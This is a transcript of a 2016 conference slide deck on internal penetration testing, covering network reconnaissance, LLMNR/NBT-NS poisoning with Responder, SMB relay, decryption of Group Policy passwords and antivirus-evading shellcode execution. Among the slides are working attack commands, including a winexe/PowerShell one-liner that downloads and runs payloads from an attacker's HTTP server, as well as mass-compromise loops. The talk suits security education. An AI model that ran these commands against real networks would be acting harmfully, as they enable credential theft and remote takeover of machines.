Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Internal Pentest: from z3r0 to h3r0

1,976 views

Published on

This presentation talks about tricks and tools to use during internal penetration tests gigs. It was presented at Roadsec SP in November 2016.

Published in: Technology

Internal Pentest: from z3r0 to h3r0

  1. 1. O MAIOR FESTIVAL HACKER DA AMÉRICA LATINA
  2. 2. Internal Pentest From z3r0 to h3r0 by Márcio "pimps" Almeida
  3. 3. Internal Pentest From z3r0 to h3r0 – Márcio Almeida * Disclaimer * • Slides in english but I’ll speak in Portuguese. • That presentation don’t have any tool created or invented by me, only how I use "well known" tools and how I can automatize their use... • On this presentation I’ll only talk about ideas and tricks that I personally use during Internal penetration test engagements. 3
  4. 4. Internal Pentest From z3r0 to h3r0 – Márcio Almeida whoami • a.k.a Pimps • CTF Player (web and crypto) • Proud Member of TheGoonies CTF Team • Check our writeups at: https://thegoonies.rocks • Penetration Tester (+7 years) • Tempest, Cipher, SpiderLabs and Securus Global • Previous Presentations • Black Hat SP, BSides LV, Ekoparty, Thotcon, AlligatorCon, YSTS… 22/11/16 4
  5. 5. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Scenario we will talk about • Internal Penetration Testing • 100% Black Box (Plug and Play) • Time constriction (3-5 days) • Without “low-hanging fruits” • Anti-virus and some other protections in place 22/11/16 5
  6. 6. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Agenda • Unfortunately we have only 40m so I choose: • Reconnaissance Tricks on Blackbox Testing • LLMNR and NBT-NS Poisoning • GPOs / GPPs • Shellcode Execution - SCE 6
  7. 7. Internal Pentest From z3r0 to h3r0 – Márcio Almeida RECONNAISSANCE TRICKS ON BLACKBOX TESTING 7
  8. 8. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Domain Computer Accounts • First enumerate all Domain Controllers: • nslookup • ping domain_name • dsquery • Etc… • Use enum4linux to enumerate all users on the domain (if null session is enabled or using a cred). • Extract all machine usernames (accounts with $ on the username, like: user$) • Nmap all those userX$.domain_name to get their IP addresses and open ports. Repeat the nmap process in all different subnets. 22/11/16 8
  9. 9. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Identifying “Live Subnets” • You don’t need scan all IPs to identify live subnets… • Scan well known IP address with well known ports to identify live addresses in subnets: • x.x.x.1, x.x.x.101, x.x.x.192, x.x.x.201, x.x.x.253, x.x.x.254 • Scan common ports: 21, 22, 23, 25, 53, 80, 443, 445, 3389 22/11/16 9
  10. 10. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Identifying “Live Hosts” • Once you find a subnet with a live IP, then scan the whole subnet with a tuned nmap command: • nmap -A -T4 -n -top-ports 1000 -- max-rtt-timeout=500ms --initial-rtt- timeout=200ms --min-rtt- timeout=200ms --open --stats-every 5s x.x.x.0/24 22/11/16 10
  11. 11. Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR AND NBT-NS POISONING 11
  12. 12. Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR and NBT-NS Poisoning • The victim machine wants to go to print server at printserver, but mistakenly types in pintserver. • The DNS server responds to the victim saying that it doesn’t know that host. • The victim then asks if there is anyone on the local network that knows the location of pintserver • The attacker responds to the victim saying that he actually is the pintserver • The victim believes the attacker and sends its own username and NTMLv2 hash to the attacker. • The attacker can now crack the hash to discover the password 12
  13. 13. Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR and NBT-NS Poisoning 13
  14. 14. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder by @lgandx https://github.com/lgandx/Responder • Performs LLMNR/NBT-NS/mDNS poisoning in a easy and highly effective way and stores the captured hashes and clear-text credentials into files. • Pre-requisites: Install Python • git clone https://github.com/lgandx/Responder.git • cd Responder • ./Responder.py -I eth0 –rPv • Use john or hashcat to crack the captured NTMLv2 hashes via dictionary attack… If you don’t have a good wordlist you can use the rockyou.txt. Works well to me in most ocasions... 14
  15. 15. Internal Pentest From z3r0 to h3r0 – Márcio Almeida DEMO Responder by @lgandx https://www.youtube.com/watch?v=mgAHX4h1ojI 15
  16. 16. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + Proxenet by @hugsy https://proxenet.readthedocs.io/en/dev/mitm/ • Use Responder to spoof NetBIOS packets and poison local network Windows workstation WPAD configuration, and redirect traffic to our evil box. • Add the plugin oPhishPoison.py to the autoload directory of proxenet and start it. • ln -sf proxenet-plugins/oPhishPoison.py proxenet- plugins/autoload/oPhishPoison.py • ./proxenet -b YOUR_IP -p 8008 -i –N • From the moment proxenet and Responder are configured and running, fake LLMNR and WPAD responses will be sent to the victims. By default, the loaded plugin will replace known binary content types (such as Office documents, ZIP files, RAR archives, etc.) with PE executables containing your payloads. • Please visit the link for detailed configuration. 16
  17. 17. Internal Pentest From z3r0 to h3r0 – Márcio Almeida DEMO Responder + Proxenet by @hugsy https://www.youtube.com/watch?v=eN_HwFkyYyw 17
  18. 18. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Quick Overview: SMBRelay 18
  19. 19. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + MultiRelay http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html • MultiRelay was built to work in conjunction with Responder.py, the common usage scenario is: • Set SMB and HTTP to Off in Responder.conf • ./Responder.py -I eth0 -rv (on one screen) • ./tools/MultiRelay.py -t Target_IP -u Administrator/Daaccount/OtherAdmin/ALL (on another screen). 19
  20. 20. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + MultiRelay http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html • Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to: • Remotely dump the LM and NT hashes on the target (that you can pass-the-hash after) • Remotely dump any registry keys under HKLM (sensitive information and configurations) • Read any file on the target. • Download any file on the target. • Execute any command as System on the target. 20
  21. 21. Internal Pentest From z3r0 to h3r0 – Márcio Almeida MultiRelay DEMO by @lgandx https://www.youtube.com/watch?v=c5GT9pAtnIw 21
  22. 22. Internal Pentest From z3r0 to h3r0 – Márcio Almeida GPO – GROUP POLICY OBJECT GPP – GROUP POLICY PROPERTIES 22
  23. 23. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Group Policies (GPO) • SYSVOL is a share present on the Domain Controllers to which all authenticated users have read access. • SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available anywhere. • All domain Group Policies are stored here: • <DOMAIN_CONTROLLER>SYSVOL<DOMAIN_NAME>Policies 23
  24. 24. Internal Pentest From z3r0 to h3r0 – Márcio Almeida 24 Clear-text Credentials on SYSVOL
  25. 25. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Group Policy Preferences (GPP) • In 2006, Microsoft Bought Desktop Standard’s “PolicyMaker” which they re-branded & released with Windows Server 2008 as “Group Policy Preferences.” • One of the most useful features of Group Policy Preferences (GPP) is the ability to store and use credentials in several scenarios (change local admin password, configure prints, configure shares, configure services, etc). • Those credentials are stored Encrypted. They are encrypted with AES-256 which should be good enough… But… 25
  26. 26. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Thanks Microsoft ;-* 26 https://msdn.microsoft.com/en-us/library/cc422924.aspx
  27. 27. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Decrypting GPP cpassword 27 https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw Local*P4ssword!
  28. 28. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Metasploit Module GPP 28
  29. 29. Internal Pentest From z3r0 to h3r0 – Márcio Almeida SHELLCODE EXECUTION - SCE 29
  30. 30. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Shellcode Execution - SCE • HIGHLY EFFECTIVE for anti-virus bypass • My own experience: worked perfectly 100% of the times that I needed use. • Works beautifully using winexe or psexec (God bless the Pass the Hash :-P) • Using a Domain Admin account is possible automatize the Mass p0wn4g3 on the network “scripting” the command reading the targets from a list. • Using a Meterpreter script you can also automatize the capture of evidences on all compromised machines (screenshot, ifconfig, hashdump, mimikatz, getinfo, etc…) 30
  31. 31. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Shellcode Execution - SCE • Using Microsoft PowerShell is possible download the binary (wget like style) to a temporary directory, execute it and erase the file after: • On Attacker machine execute: python –m SimpleHTTPServer • Will enable http://YOUR_MACHINE:8000/ on Attacker machine • winexe --user=DOMAIN/USER%HASH_OR_PASSWORD //TARGET "cmd /c "del teste.bat & echo powershell -c "(new- object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE :8000/sce.32.exe','sce.32.exe')" >> teste.bat & echo powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE :8000/hack.bat','hack.bat')" >> teste.bat & echo hack.bat >> teste.bat & teste.bat"" 31
  32. 32. Internal Pentest From z3r0 to h3r0 – Márcio Almeida SCEPWN-NG by @joshuaskorich https://github.com/joshuaskorich/scepwn-ng • Using a samba share you can execute the binary directly from the sharing folder injecting the meterpreter session directly on memory without any file ever touch the disk! • Details of how configure the environment on scepwn-ng github. • After configure your environment, and get a privileged account, just execute: • ./scepwn-ng.rb -u 'username%password_or_hash' -t TARGET • If you put this command in a loop to read from a list of targets and use a Meterpreter script to automatize commands on targets, it becomes a mass auto-pwn tool. 32
  33. 33. Obrigado! Twitter: @marcioalm Email: marcioalma@gmail.com #dontstophacking

×